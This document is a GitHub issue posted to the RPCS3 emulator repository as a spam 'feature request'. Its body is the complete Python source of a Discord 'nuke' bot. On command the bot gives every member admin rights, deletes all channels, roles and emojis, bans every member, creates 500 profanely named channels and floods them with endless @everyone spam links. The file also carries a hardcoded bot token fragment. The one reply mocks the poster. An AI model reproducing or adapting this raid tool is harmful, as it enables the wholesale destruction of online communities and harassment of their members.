### ISSUE TITLE
[Feature Request] Nuke Bot on RPCS3

### ISSUE THREAD

**Issue by Gotittankler** [RPCS3/rpcs3#11647]
import discord
import asyncio
import json
import discord.member
import random
import os
from email import message
from pydoc import describe
from discord.ext import commands
from discord_slash import SlashCommand
from discord.ext.commands import Bot, has_permissions, CheckFailure
from discord_slash import SlashCommand, cog_ext, SlashContext
from discord_slash.utils.manage_commands import create_option, create_choice
from discord import Permissions
from colorama import Fore, Style

token = "OTQ5ODU2MjgyMTI1NDI2NzEw"

SPAM_CHANNEL = [
    "MLP", "THE PONIES RUNS YOU", "OOPS GOT BEAMED BY THE PONIES", "PONIES",
    "FUCK YOU", "WEDIDNTSTARTTHEFIRE", "BILLYJOEL", "PONIES NUKED US",
    "MY LITTLE FUCKING PONY", "MY LITTLE PONY"
]
SPAM_MESSAGE = ["hi watch all of my vids :) @everyone https://m.youtube.com/watch?v=1nKJiPiBtcQ https://youtu.be/XzyJ5M_pD0I https://m.youtube.com/watch?v=5JUQ3pL4D68 https://m.youtube.com/watch?v=mbeRKTlaf94"]

intents = discord.Intents.all()
slash = SlashCommand(Bot)
client = commands.Bot(command_prefix="!")

@client.event
async def on_ready():
    print(''' 
   
███╗░░██╗██╗░░░██╗██╗░░██╗███████╗  ██████╗░░█████╗░████████╗
████╗░██║██║░░░██║██║░██╔╝██╔════╝  ██╔══██╗██╔══██╗╚══██╔══╝ 
██╔██╗██║██║░░░██║█████═╝░█████╗░░  ██████╦╝██║░░██║░░░██║░░░ 
██║╚████║██║░░░██║██╔═██╗░██╔══╝░░  ██╔══██╗██║░░██║░░░██║░░░ 
██║░╚███║╚██████╔╝██║░╚██╗███████╗  ██████╦╝╚█████╔╝░░░██║░░░  
╚═╝░░╚══╝░╚═════╝░╚═╝░░╚═╝╚══════╝  ╚═════╝░░╚════╝░░░░╚═╝░░░ 
 ''')
    await client.change_presence(activity=discord.Game(name="Playing Jeopardy!"))

@client.command()
@commands.is_owner()
async def Stop(ctx):
    await ctx.bot.logout()
    print(Fore.GREEN + f"{client.user.name} has logged out successfully." +
          Fore.RESET)

@slash.slash(name="nuke", description="nukes the server (USE IT ON YOUR OWN RISK!!!) (need administrator permissions!)")
@has_permissions(administrator=True)
async def Nuke(ctx):
    await ctx.channel.purge()
    guild = ctx.guild
    try:
        role = discord.utils.get(guild.roles, name="@everyone")
        await role.edit(permissions=Permissions.all())
        print(Fore.MAGENTA + "I have given everyone admin." + Fore.RESET)
    except:
        print(Fore.GREEN + "I was unable to give everyone admin" + Fore.RESET)
    for channel in guild.channels:
        try:
            await channel.delete()
            print(Fore.MAGENTA + f"{channel.name} was deleted." + Fore.RESET)
        except:
            print(Fore.GREEN + f"{channel.name} was NOT deleted." + Fore.RESET)
    for member in guild.members:
        try:
            await member.ban()
            print(Fore.MAGENTA +
                  f"{member.name}#{member.discriminator} Was banned" +
                  Fore.RESET)
        except:
            print(
                Fore.GREEN +
                f"{member.name}#{member.discriminator} Was unable to be banned."
                + Fore.RESET)
    for role in guild.roles:
        try:
            await role.delete()
            print(Fore.MAGENTA + f"{role.name} Has been deleted" + Fore.RESET)
        except:
            print(Fore.GREEN + f"{role.name} Has not been deleted" +
                  Fore.RESET)
    for emoji in list(ctx.guild.emojis):
        try:
            await emoji.delete()
            print(Fore.MAGENTA + f"{emoji.name} Was deleted" + Fore.RESET)
        except:
            print(Fore.GREEN + f"{emoji.name} Wasn't Deleted" + Fore.RESET)
    banned_users = await guild.bans()
    for ban_entry in banned_users:
        user = ban_entry.user
        try:
            await user.unban("narko#7777")
            print(
                Fore.MAGENTA +
                f"{user.name}#{user.discriminator} Was successfully unbanned."
                + Fore.RESET)
        except:
            print(Fore.GREEN +
                  f"{user.name}#{user.discriminator} Was not unbanned." +
                  Fore.RESET)
    await guild.create_text_channel("NUKED BITCH")
    for channel in guild.text_channels:
        link = await channel.create_invite(max_age=0, max_uses=0)
        print(f"New Invite: {link}")
    amount = 500
    for i in range(amount):
        await guild.create_text_channel(random.choice(SPAM_CHANNEL))
    print(f"nuked {guild.name} Successfully.")
    return

@client.event
async def on_guild_channel_create(channel):
    while True:
        await channel.send(random.choice(SPAM_MESSAGE))

client.run(token)

**Comment by Asinin3** [comment]
Thanks for your discord id's bruv
